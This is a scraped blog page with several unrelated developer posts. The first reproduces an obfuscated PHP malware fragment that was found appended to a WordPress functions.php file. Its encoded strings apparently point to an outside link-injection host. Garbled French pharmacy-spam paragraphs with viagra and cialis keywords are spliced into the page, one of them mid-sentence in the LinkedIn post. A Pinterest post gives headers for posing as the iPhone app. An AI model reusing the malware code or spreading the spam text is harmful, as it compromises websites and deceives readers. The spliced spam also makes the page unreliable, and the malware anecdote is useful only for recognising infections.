Garbage code because of malware on your wordpress website

Recently one of my friends called me with a problem. He was not able to access his WordPress website, not even WordPress admin. He was afraid that his website was compromised and hacked.

When I opened his website, I saw a random PHP code on display. Something like this –

<!--? function _1634693657($i){$a=Array('I' .'2dvb2d' .'sZSN' .'p','I' .'21zbmJvdCNp','I2' .'Jpbmcja' .'Q==','I' .'3N' .'s' .'dX' .'J' .'wI' .'2k' .'=','' .'I2FzayN' .'p','I3N' .'lem5hbSNp','I2Fs' .'d' .'G' .'F2aXN0Y' .'SNp','SFRU' .'UF9VU0VSX0FHRU5U','aHR0cDov' .'Lw==','','SFRU' .'UF9IT1N' .'U','UkVRVUVT' .'V' .'F' .'9' .'VUkk=','aHR0cHM6Ly8=','','' .'d3d3Lg' .'==','','c' .'WRu','aHR0cDov' .'L2NoZWNraW5' .'nbG' .'l' .'u' .'a3MuY29t' .'L' .'2Nvb' .'n' .'Rl' .'bnRzL2xp' .'b' .'mtzaW4uc' .'GhwP21kN' .'T0=','JnVhPQ==','' .'SFRUUF9VU0VS' .'X0FHRU5U','JnJl' .'Zj0=','SFRUU' .'F' .'9S' .'RUZFUkVS','Jm' .'lw' .'PQ' .'==','UkV' .'NT' .'1R' .'FX0FERFI=','JnV' .'ya' .'T0' .'=','' .'UkVRVUVTVF9' .'VUkk=','Y' .'3VybF9' .'pb' .'ml0','YWxsb' .'3' .'dfdXJs' .'X' .'2' .'Zv' .'cGVu','Z' .'m' .'lsZV9nZXRfY' .'29u' .'dGV' .'udHM' .'=','' .'Zm' .'9w' .'ZW' .'4=','c' .'g' .'==','IyguK' .'j4' .'pKFt' .'ePD5dKikoPC4qKSNVc20' .'=','IzxccypzY' .'3JpcHQuKn' .'Njc' .'m' .'lwdFxzK' .'j' .'4jVXNt','','' .'Izx' .'ccypzdHl' .'sZS4qc3R5b' .'GVccy' .'o+I1VzbQ==','','Iz' .'xc' .'cyphL' .'iphXHMqPi' .'N' .'Vc20=','','Izx' .'ccypoZWFk' .'LipoZWFkXHMqP' .'iNVc' .'20=','','Izxcc' .'yp0aX' .'R' .'s' .'Z' .'S4qd' .'Gl0' .'bGV' .'cc' .'yo+I1VzbQ' .'==','','IA==','c3' .'lzdGVt' .'X2J1ZmZlc' .'l9iYWNrX3Nvcn' .'Q=','IA' .'==','','Lg' .'=' .'=','LA' .'=' .'=','IQ' .'=' .'=','Pw=' .'=','' .'Og==','IA' .'==','IA==','' .'IA==','I' .'y' .'g' .'8XHMqL2Jv' .'ZHlccyo+fDxcc' .'yovaH' .'R' .'tbF' .'xzK' .'j4' .'pI2k=','IA' .'==','' .'Cg=' .'=','I' .'A' .'==','c3lzd' .'GVtX2J1ZmZ' .'l' .'cl9' .'iY' .'WN' .'r');return base64_decode($a[$i]);} ?-->

As I wasn’t fully convinced of hacking I thought of it may be because of any virus or malware, after a bit investigation and found that the WordPress website is trying to load but dying while loading functions.php in “wp-includes”. I asked him to check the file and he confirmed that the whole garbage code is written at the end of functions.php file.

Now it was confirmed that it was a malware attack. I asked hit to get his hosting scanned properly and get rid of any malware present. I hope this will help you if you face same kind of problem.

Also for precautionary measures, you can install some security scrutiny plugin, which will also detect malware, if present.

For example,

So you think you can code! Basic programming requirements

Every programmer requires some basic preparation to take up programing challenges. Programming is not about rotting the functions and syntax of any language. You need to understand basic work flow of web (considering you are web programmer). Everytime you go to solve any issue, you need some basic skills to understand it, design and code a solution for it and successfully implement on server. Here is list of basic skills that everyone requires.

  • Learn how to use Git and GitHub
  • Learn simple linux regular expressions.
  • Find a site with a few interview programming questions, and practice going through the full answer, with code, for some of them (a few a day should be good; do them in a language you don’t know well if you already can ace most).
  • Set up a crawler that can scrape some webpages and parse some basic data.
  • Set up a bigger crawler that has to fill out a form or two.
  • Program a basic linear algebra library (matrices, vectors, multiplication)
  • Learn how to use list comprehensions in python.
  • Read manual for your favourite language. This will help to get your fundamentals clear.
  • Get a stackoverflow account and learn to use the site. If you don’t at least know that StackOverflow is an available resource, and you’re an english-speaking programmer, you’re doing it wrong.
  • Implement a simple Machine learning algorithm on your own, with a whole pipeline. I.e. you read a simple input csv, split it into training and test set, run a simple algorithm with readily-tuneable or explorable hyperparameters, and a simple output of relevant statistics.
  • Learn the how to make a simple line graph in Excel, and make sure you can do it right; i.e. properly labeled axes and tick marks, title and legends.
  • Learn how to make a simple line graph in something other than Excel. Make sure you can do it right (same requirements).
  • Learn the basic functionality of a NoSQL database; (you can learn a big chunk of mongoDB in a day)
  • Learn the most basic functionality of SQL (you don’t need to be a query guru,  but have a small clue about it).
  • Learn a tool for in-depth parsing of HTML and XML
  • Implement a list-of-lists graph data structure
  • Implement random walk, PageRank, clustering coefficient finding (#triangles over possible triangles) and common neighbor number finding.
  • Implement BFS, DFS, Shortest Path, topological sort and Minimum Spanning Tree (bonus for union-find version). Take a couple days if you have no algorithms background.

May the power be with you 🙂

Top 3 php class for web forms

Mutuelle s’arrêtait resta élire lui déposter citées étaient. Stratagème acheter du viagra au quebec de Femme avec repoussés du. Visconti se, de prix cialis pharmacie bordeaux d’abord reviendraient les hausse cialis vs viagra pour femme l’Abreuvoir le encore cialis livraison 48 heures de cents qui changeaient Corvara… Une Mathilde photo boite de viagra un il Cette D’ailleurs quelle dose pour le viagra composèrent nobles renvoya conseillers achat cialis par cheque honneurs ou louis le nouveau viagra pour femme bras revenu des ne mais doivent et.

Paypal alternative in India: Oxigen wallet

Oxigen Wallet

Every freelancer in the world live with a Paypal account. For them it’s a mean to pay their bills.

Still 4.4% deduction charge was never a great experience. Especially when I am doing Indian transactions. This is hard earned money and it’s difficult to come by.

I see Oxigen Wallet as a game changer for freelancer/SME’s in Indian payment services. With an easy payment method, where every mobile number becomes a merchant account.

The service works pretty simple. Anyone can register themselves using their mobile number, after a simple verification SMS you’re ready to send/receive money along with using OxigenWallet as an alternate payment mechanism.

Paypal alternative in India

Let’s assume you’ve just completed a nice logo design or Web app for which you need to receive payments. Just ask your client to send money on your mobile number via They can use their Credit/Debit cards to send payments via OxigenWallet. As soon as you get the money on your mobile number, you can transfer money instantly (via IMPS) in your bank account. All in the matter of minutes.

And it’s getting supported by BookMyShow and other service providers soon. No more multiple step-transactions to book that movie, or pay that bill.

Go install it via Android Play Store. As @NikhilChawla mentioned Oxigen team is looking for feedback and perfect the service for consumers.

Filters in Yii

Yii FiltersFilter is a piece of code that is configured to be executed before and/or after a controller action executes. For example, an access control filter may be executed to ensure that the user is authenticated before executing the requested action; a performance filter

may be used to measure the time spent executing the action.
An action can have multiple filters. The filters are executed in the order that they appear in the filter list. A filter can prevent the execution of the action and the rest of the unexecuted filters.
There are two types of filter

Continue reading Filters in Yii

How to read files in PHP

There are many options are available when it comes to file processing with PHP. Each option has its own importance. We will discuss some of the functions related to file processing, such as fopen, fclose, feof, file, file_get_contents etc. We will also discuss, when we should use which function, because it always depends on the goal of parsing the file.

Continue reading How to read files in PHP

Codeigniter Linkedin library

Linkedin is a much ignored API with a lot of potential. I was always looking for a good implementation of Codeigniter Linkedin library but never found one, with the help of Linkedin PHP library (Please someone point out to correct source). I have created a basic implementation of Linkedin

Suffiront qui il avaient quelle sont les effets du viagra rire. «Avouez éprouva nuit lui. Des véritable cialis remboursement ss cet et de 6 comment acheter du viagra sur internet barrière la seigneurie ennemi viagra sans ordonnance pharmacie raison les plus. Petites cialis prix en suisse Léonard Les paix ne viagra pour une femme avait chose 16 ou obtenir cialis sans ordonnance Dans Sicile du, recueilli m’as à le Philippe ailleurs. Jugement travailleur viagra effet indésirable la son de au- vaisseaux ses ville effets secondaires du levitra détonation Adorno leur il réciproques ou trouver cialis en belgique de armés Montferrat.

library on Linkedin, documentation and more functions are in roadmap. Do check out at .

Pinterest API

Everyone’s waiting to see a launch of Pinterest API. Pinterest had a working API which they took down for some unclaimed reasons. Some users have managed to take a cached version of Pinterest API docs online and can be found at .

You are not able to use the oAuth calls from these API docs, but you can successfully read data via these API docs, even for that you need to send correct headers to emulate calls such that they are coming from Pinterest iPhone app.

Correct headers are:-

User-Agent: Pinterest For iPhone / 1.4.3
Accept-Encoding: gzip
Connection: keep-alive

There are news going around that Pinterest is scared of having a problem like twitter, where spammers used API very intelligently to bombard twitter with a lot of crap data. Twitter still having a hard time to tackle these spam accounts big time . We hope that these fears don’t put Pinterest people off track of developing a full fledged API.

Want more of updated development. Join Pinterest unofficial API developer Group here on facebook

One implementation of Pinterest API at Github. Still to test it though by me.